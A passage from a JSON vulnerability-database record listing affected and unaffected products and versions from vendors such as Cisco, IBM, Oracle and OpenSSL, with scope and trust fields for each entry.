"4.3.6" }, { "model": "business intelligence enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.1.9.0" }, { "model": "digital media manager 5.3.6 rb3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4.4.0" }, { "model": "identifi wireless", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "10.21" }, { "model": "series digital media players", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "44000" }, { "model": "ata series analog terminal adaptors", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1901.3" }, { "model": "prime network services controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ata series analog terminal adaptors", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1900" }, { "model": "asr series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "500021.2" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2.2.2" }, { "model": "project openssl 1.0.1t", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.15" }, { "model": "ons series multiservice provisioning platforms", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1545410.7" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.12" }, { "model": "telepresence system series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "cognos metrics manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.0.23" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.2.24" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.0.12" }, { "model": "worklight consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.2" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.19" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.3" }, { "model": "hosted collaboration mediation fulfillment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications manager session management edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.0.4" }, { "model": "fujitsu m10-4 server xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2230" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.2" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.0.27" }, { "model": "security guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.2" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.0" }, { "model": "webex meetings server multimedia platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "unified ip conference phone 10.3.1sr4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8831" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.7" }, { "model": "prime network registrar", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.3.5" }, { "model": "netsight appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "6.3.0.179" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2.2.4" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.20" }, { "model": "project openssl 1.0.2d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "series stackable managed switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5000" }, { "model": "prime access registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified intelligent contact management enterprise", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6.1" }, { "model": "stealthwatch flowcollector netflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.2.14" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.3.2" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.0.6" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4.3.0" }, { "model": "ucs manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.0" }, { "model": "network analysis module", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.2(2)" }, { "model": "video surveillance 4300e and 4500e high-definition ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified attendant console department edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.26" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.0.8" }, { "model": "ip series phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "78000" }, { "model": "aironet series access points", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "27000" }, { "model": "onepk all-in-one virtual machine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3387" }, { "model": "fujitsu m10-4 server xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2290" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.6.0.1" }, { "model": "netsight appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "7.0" }, { "model": "industrial router", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9100" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "unified intelligence center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "sparc enterprise m5000 xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1121" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "11" }, { "model": "video distribution suite for internet streaming", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "13006.1" }, { "model": "sdk for node.js", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.7.0.0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.7.1" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.116" }, { "model": "cloupia unified infrastructure controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11006.1" }, { "model": "agent desktop for cisco unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "packaged contact center enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.31" }, { "model": "adaptive security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.0.8" }, { "model": "secure global desktop", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.2" }, { "model": "telepresence sx series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "tealeaf customer experience", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.19" }, { "model": "cognos metrics manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.5" }, { "model": "project openssl 1.0.1n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "nac appliance clean access server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "project openssl 1.0.1o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "fujitsu m10-4 server xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2280" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "sdk for node.js", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.4" }, { "model": "webex meetings for windows phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "80" }, { "model": "firesight system software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.1.0.1" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.27" }, { "model": "spa232d multi-line dect analog telephone adapter", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "fujitsu m12-2s server xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2230" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.1" }, { "model": "prime optical for service providers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.10" }, { "model": "smart care", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "8" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4.6.0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.2.16" }, { "model": "universal small cell cloudbase factory recovery root filesystem", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.99.4" }, { "model": "security network protection", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.11" }, { "model": "edge digital media player 1.2rb1.0.3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "340" }, { "model": "network performance analysis", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.1.8" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "60006.2.19" }, { "model": "unified ip conference phone for third-party call control", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "fujitsu m12-1 server xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2230" }, { "model": "project openssl 1.0.2e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "sonas", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.5.2.5" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.14" }, { "model": "webex meetings for windows phone", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "82.8" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.2.0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.1.0" }, { "model": "security guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "project openssl 1.0.1q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "spectrum control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.10" }, { "model": "universal small cell cloudbase factory recovery root filesystem", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0" }, { "model": "secure access control system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.8.0.32.7" }, { "model": "fujitsu m10-1 server xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2271" }, { "model": "telepresence integrator c series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "tivoli provisioning manager for os deployment intirim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.133" }, { "model": "secure global desktop", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.3" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.9" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "webex meetings client hosted", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.13" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2.0.8" }, { "model": "content security management appliance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.1.140" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.2.8" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "stealthwatch udp director", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "intrusion prevention system solutions", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified ip conference phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "nexus series switches 5.2.8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6000" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.18" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.1" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.36" }, { "model": "fujitsu m12-1 server xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2290" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.4" }, { "model": "jabber client framework components", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime ip express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified sip proxy software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.4" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.6" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "mysql workbench", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.1.4" }, { "model": "communications session border controller scz7.2.0", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "security manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "netflow generation appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber for mac", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.403" }, { "model": "unified sip proxy software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "purview appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "6.0" }, { "model": "mysql enterprise monitor", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.1.4.7895" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "99510" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.0.20" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.3" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89450" }, { "model": "telepresence supervisor mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "80500" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20280.6" }, { "model": "netsight appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "5.0" }, { "model": "telepresence server and mse", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "701087104.4" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.10" }, { "model": "ucs series and series fabric interconnects", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "620063000" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.12" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2.2" }, { "model": "webex meeting center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.11" }, { "model": "communications eagle lnp application processor", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "10.0" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.4" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.24" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.6.0.0" }, { "model": "nac appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "6.0" }, { "model": "purview appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "6.4" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.1" }, { "model": "netflow generation appliance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.1(1)" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.8" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.13" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5.2" }, { "model": "enterprise content management system monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.2" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.6" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.2.0" }, { "model": "secure global desktop", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.71" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.11" }, { "model": "socialminer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nac appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "6.4" }, { "model": "sparc enterprise m8000 xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1117" }, { "model": "powerkvm update", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.1.1.3-6513" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.34" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.2.0" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.0" }, { "model": "spa112 2-port phone adapter", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "intracer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance series high-definition ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "40002.9" }, { "model": "purview appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "6.3" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.18" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.0.2" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1051.07" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.3" }, { "model": "jabber for windows", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "oss support tools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.8.15.7.15" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.0.26" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.1.3" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.2.4" }, { "model": "business intelligence enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.2.1.3.0" }, { "model": "prime infrastructure", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.2" }, { "model": "telepresence video communication server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nac appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "6.3" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "9.1" }, { "model": "video surveillance 4300e and 4500e high-definition ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.9" }, { "model": "jboss core services on rhel server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "70" }, { "model": "powerkvm update", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.23" }, { "model": "computer telephony integration object server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6.1" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "11000" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "7" }, { "model": "telepresence sx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.0.18" }, { "model": "telepresence server on multiparty media and", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3103200" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.2" }, { "model": "enterprise content management system monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.1" }, { "model": "content security appliance update servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.0.1" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "videoscape anyres live", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9.7.2" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "99710" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.4" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.6" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.9" }, { "model": "sparc enterprise m3000 xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1117" }, { "model": "netsight appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "4.4" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.32" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.2.3" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.0.2" }, { "model": "security guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.4" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.1" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "firesight system software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.4.1.9" }, { "model": "macos", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "10.12.2" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.13" }, { "model": "universal small cell iuh", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.17.3" }, { "model": "ata analog telephone adaptor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1870" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1.1" }, { "model": "project openssl 1.0.1m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "16.4" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "500-326.1" }, { "model": "unity express", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10" }, { "model": "expressway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtualization experience media edition", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "vm virtualbox", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "5.1.8" }, { "model": "sdk for node.js", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.15" }, { "model": "small business series managed switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.0.35" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.3.1" }, { "model": "fujitsu m12-2s server xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3000" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.6" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10006.1" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2.0.0" }, { "model": "telepresence isdn gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32410" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.30" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "series smart plus switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2200" }, { "model": "fujitsu m12-1 server xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3000" }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.2.2" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "sparc enterprise m9000 xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1118" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.21" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.0" }, { "model": "smartcloud entry appliance fi", "scope": "eq", "trust": 0.3, 